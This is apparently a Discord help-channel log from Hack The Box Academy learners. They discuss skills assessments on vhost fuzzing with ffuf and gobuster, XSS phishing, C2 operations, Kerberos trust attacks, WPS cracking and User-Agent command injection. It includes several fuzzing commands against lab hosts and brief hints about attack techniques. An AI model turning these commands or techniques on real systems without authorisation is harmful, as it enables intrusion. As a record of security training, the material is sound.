ok but where? I tried to search but couldn't find it.
I'm still not finished with the module so I might find it along the way but I just want to take a look.
Did you pick the right project type? .net project vs .net framework project?
it's on the intro page
Thank you.
Yeah, As shown in the picture I sent, I copied the command in the log and run, I received the alpha shell, but it seems the bot doesn't execute my command or is there something blocking it?
What module is this related 2?
Skills Assessment II Introduction to Windows Evasion Techniques also encountered the same situation
User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them
Friends, he has more than a thousand flag.txt files, how can I filter out the ones with content?
What happens when you write text to a file? What exactly changes?
I used find to query the flag file and found more than a thousand flags. I don't know how to determine which file is correct. I won't post pictures, sorry.
Yo
Yooooo @plush hazel
Problem solved, thank you for your reply
Hi brother, did you find the answer and can u give me hint? plz
Module: Intro to C2 Operations with Sliver
Section: Skills Assessment
For the last question, I have tried both the Abuse KRBTGT attack and the TrustKey attack but for both of them, when I try to access the 2nd domain I get a "Access Denied" followed by a "Does not exist" error. Any advice?
CROSS-SITE SCRIPTING(XSS) -Phising. Could someone tell me what I'm doing wrong ? for some reasons
I can't listen to the port 80 ?
Choose a different port
Any other port and specify it in your xss payload
I see
Will try that
it worked thx
I didn't get wym at first, sorry I'm slow it's 6am rn
yes, the trick is to use cmd.exe over powershell
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
what should i do
What module are you referring to?
I don't know what to say.
Information security basics
windows
skills assessment
Question 10
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb" on the inf gathering web edition i have performed the following scan gobuster vhost -u http://inlanefreight.htb:58757 -w ~/Desktop/wordlists/subdirectories-discover/top1mparams.txt -t 100 --append-domain but i only see some of the vhosts that are being asked for:
Found: admin.inlanefreight.htb:58757 Status: 200 [Size: 100]
Found: blog.inlanefreight.htb:58757 Status: 200 [Size: 98]
Found: forum.inlanefreight.htb:58757 Status: 200 [Size: 100]
Found: support.inlanefreight.htb:58757 Status: 200 [Size: 104]
Found: browse.inlanefreight.htb:58757 Status: 200 [Size: 102]
Found: Blog.inlanefreight.htb:58757 Status: 200 [Size: 98]
Found: Admin.inlanefreight.htb:58757 Status: 200 [Size: 100]
am i missing something from the course material on how to enum them
Hey guys! I'm new to htb and as a teenager I don't know from where to start.. I started with the information security foundation path and am halfway into the path.. I have been astonished by ethical hacking when I was young but still don't know my passion lol.. I know basic things nothing else really.. along with htb I'm also taking a 5 hr ethical hacking crash course available on yt and am also looking into learning python
try another wordlist
look through seclist
for the modules, the ones that they specify in the cheatsheets usually work
i have used it
as someone who tried both HTB and THM, I'd say start with THM as they tend to be more beginner friendly.
once you have solid foundation, switch to HTB.
you can DM so I can tell you from which module to start and where to go.
Thank you so much, appreciate it!
I thought people were ignoring me since I was dumb? Lol
no one is ignoring, when someone can help here they will.
the paths in academy are beginner friendly
I did till learning progress of the information security foundation path
I don't agree tbh.
especially that academy modules tend to be a mouthful of reading.
True, I only catch up when I read them some times
Sorry, guess I have to go to general
help
I can't find the flag. Can anyone give me some hints?
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
nvm my grep was falsely done i found them
they are pretty well explained
in my opinion
try using ffuf instead of gobuster
It's the best for subdomain fuzzing in my opinion
ok, isn't ffuf good for everything though
just not the best
I use it with subdomains for the other stuff I use feroxbuster or dirbuster
Guys I'm having a problem...
While entering general, discord asks me if I'm done reading and takes me to modules.. even though I open it and go back to general, the same thing pops up again
Sorry I'm asking this here
But I can't open generals
you need to verify
How?
read #welcome
what does the message say? maybe it has the steps to verify
Oh..
Hi guys, is there anyone who can access the skill assessment machine on the module (MSSQL, Exchange, and SCCM Attacks)?
I can't access the RDP since 3 hours ago, I think it's under maintenance or something?
spoiler and wrong channel (ask in boxes)
Sorry, I'm new to the dc. Won't happen again!
guys has anyone installed finalrecon recently
i cant seem, to get it running
and the worst is i tried following the docs for installing it using the git repo
and the .py file is not even there
Yes I installed recently
I had no issues installing on parrot
anyone done this Attacking Wi-Fi Protected Setup - Skills Assessment?
Merry Christmas all
Someone can help me with this please? i can't find the flag
Help with what?
If you can't find the flag, skill issue /s
Might be best to just view the page itself instead of via burp, then ctrl+f for /root or typical root filesystem stuff
Wow okay, I'll give that a shot. That's super weird. I ended up looking up the hash of the file on virustotal lol. Thanks for the response!
Also: quotes are* important
hey @uneven dune Can you check dm?
thank you brother you saved my life @fathom pendant
Also once you inject the User Agent you don't need to keep resending it
Which is why it's recommended to visit the page in a browser instead of via burp
So you're not having dozens of different things running the command
Lol this happened to me on one of the boxes I did XD
how can i unlock HTBP CPTS ?
By paying for the course
Either silver annual [comes with voucher and access to t2 and below modules] or one month plat, one month gold + voucher
#welcome <-- instructions
the examen is very difficult?
It's tough but fair
exam sorry xD
It wouldn't be worth it if it was easy
i would like to work in this but i don't have knowledge
Well you need to complete the required path to be able to take the exam anyway
But the exam doesn't deviate from techniques you learned
what do you recommend?
Huh?
Silver annual is good if you want a walkthrough for when you get stuck, or as a reference to see if something could have been done differently
Then you aren't learning
Notes can help you get unstuck
Run into error? Note it down and what you did to resolve
Yeah generally the solution is "use PwnBox"
do you recommend me to do a bootcamp?
Seasons Greetings all you far-too dedicated hackers... and regular greetings to those of you for whom this is just another day.
Command Injection's assessment was cool, but boy I felt like I was just smacking away at it for far too long until something worked. Is that largely what hacking is?
Yes and no. If you start from a black box perspective and therefore don't know what's happening on the machine you are trying to hack you have to try out a few things to see how the service reacts and to discover if there are vulnerabilities. But you are not completely guessing, you have an idea of what could be misconfigured and you try for example common bypasses
So you want to be doing educated guesses eventually
Yeah but you can't run to pwnbox for stuff outside of htb
?
not very hollywood
j/k, good to know my guesses were educated enough
Tech bootcamps are mostly scams
You don't really learn much because of how fast paced the environment tends to be
then? what do you recommend me?
HTB academy is good stuff without a time pressure
And well priced
do you think that could i get a job with this?
Certs don't guarantee jobs, but they can give you a leverage of knowledge and skill
then?
Skills land jobs
Making yourself stand out
With tech layoffs, companies can find someone with a cert a dime a dozen, so you have to stand out more
you give me a lot of encouragement xD
cybersecurity isn't necessarily an entry level thing, especially pentesting ¯\_(ツ)_/¯
Entry level pentesting is like mid-level IT
oh my god
@plush venture also include the module name and section you're on
ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:50801/ -H 'Host: FUZZ.academy.htb' -fs 900 -v
module: attacking web application ffuf
section: filtering results
Try a bigger wordlist
What type of analysis can be used to predict future probabilities? Help please
but the thing is, it's at least supposed to take 2-3 seconds even if my computer has some sorta alien in it which is helping it to send 5000 req instantly which im sure my computer is incapable of
What academy module is this for, it's likely in the reading
If your computer is incapable of it. It wouldn't try
Penetration Testing Process
The section should tell you the answer
that's why im confused is it collecting garbage or smth like that?
Try a different wordlist
okay
Wait
okay
Do you have academy.htb in your hosts file?
oh...
And is it ip academy.htb [note you don't put the port]
i forgot....
am i supposed to keep the port or remove it?
oh, i thought it was intended for smth else
Who else would I be talking to. Besides a wall
but cant i just use the ip in ffuf directly?
though it wasn't working
but why not?
I mean, since you're using the "HOST:
.." header
i removed it and tried with ip once
In your http request you use the port
but it was still the same
ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:50801/ -fs 900 -v
Nope
You still use the host header
Also are you sure 900 is the right filter size
it wasnt working if i replaced the academy.htb with ip too and why do i need header?
yes
are you work of this friend?
Because of how things are configured
okay...
If it was a public website a dns server would handle the http://FUZZ.Example.com requests, but since these targets use vhosts you'll need to use host headers, as host header tells the server that you want to request a specific resource on it
Vhosts sit within the webroot of a server
Not all vhosts are exposed via dns irl either
/var/www/html/<vhost>/ and whatever web service is configured to handle those requests and pull the right resources
For my clients, the test environments are not in their dns but just in vhosts
arent vhosts just subdomains but not present in public dns servers?
@fathom pendant
it depends
huh?
Vhosts can be publicly routed
nah it alright
"how so? isn't it necessary to have the ip of the domain in order to access the host under it?"
This was what you wrote
yes
You'll need the IP of the server, yes. But you can put the (sub)domain in your hosts file and when sending a request, it will tell the (sub)domain you're looking for in the headers. That's why ffuf vhost enumeration works via the -H "Host: FUZZ.domain.tld"
wdym by putting it in the hosts file?
/etc/hosts contains entries to map certain IPs to a hostname
The computer file hosts is an operating system file that maps hostnames to IP addresses. It is a plain text file. Originally a file named HOSTS.TXT was manually maintained and made available via file sharing by Stanford Research Institute for the ARPANET membership, containing the hostnames and address of hosts as contributed for inclusion by me...
You could call it your personal DNS "phone" book
oh i thought you were talking bout files in the server
Your system checks your hosts file -> public dns
i misread it
yes
If not in hosts it checks public dns servers to see if it's routed
but why couldn't i simply use the ip in place of the url in the command?
You can
That should work
Just don't forget the header, the host needs to be sent. If you don't send it, the server won't know what vhost to serve
wait whats the use of header in here?
The header will contain the Host you are requesting
oh
but isnt that automatically determined by the domain i provide in url?
shit nvm, i need to learn about web stuff a little more
Only the domain is, not necessarily the header
then do i don't do bootcamp?
Don't do bootcamps
As i said, they are mostly scams
Fast paced shit prep
Hey, I know that this is not the right place to post this, but I need a little help with redeeming a gift card in the academy. When i try to redeem it it says that sth went wrong and that i should contact the support. I can't seem to find how to contact them on the site so i decided to post here. I think I know what my issue is but, for this i would also need help from support.
Need some help? Learn how to reach the support team on Academy.
Appreciate
Hi, i am stuck in the last assessment question of WPS module. Tried everything including generating list of keys and bruteforcing with bash script. Everything seems to fail. Any help will be appreciated
i'm going to dinner Merry Christmas all
Enjoy. Merry Christmas
They tell you why
Escaping tags
It's told in the section why
The HTB walkthroughs don't explain much of anything because they expect you to have read the material
Look for a common thread to filter out
Like response size
how do i find the one required parameter
how will i know the size?
It's not gonna be the same as the examples
Ffuf literally tells you the size as part of the result
You don't need to review all the results
-fs ?
i thought it gave the ones i needed
now i know its filtering out
ok now it makes sense
Reading the manual explains how it works
yes ill keep that in mind
The -f[X] options are options to filter out; the -m[X] options are to match
More often than not you're filtering out junk
Can anyone help with the evasion module? I have no experience in csharp and windows api so I literally have no idea why it doesnt work
Im in Dynamic Section
okay idk how but ig i need help with the solution
i cant think of any other possible way
i tried all the possible filters with all the existing file under this domain
Why are you using 500 threads??
ffuf does stand for Fuzz Faster U Fool
idk im just frustrated af, i've been trying to get past this for the past 2 hrs
Are you filtering the common occurrence?
yes
Are u sure thatβs the right parameter?
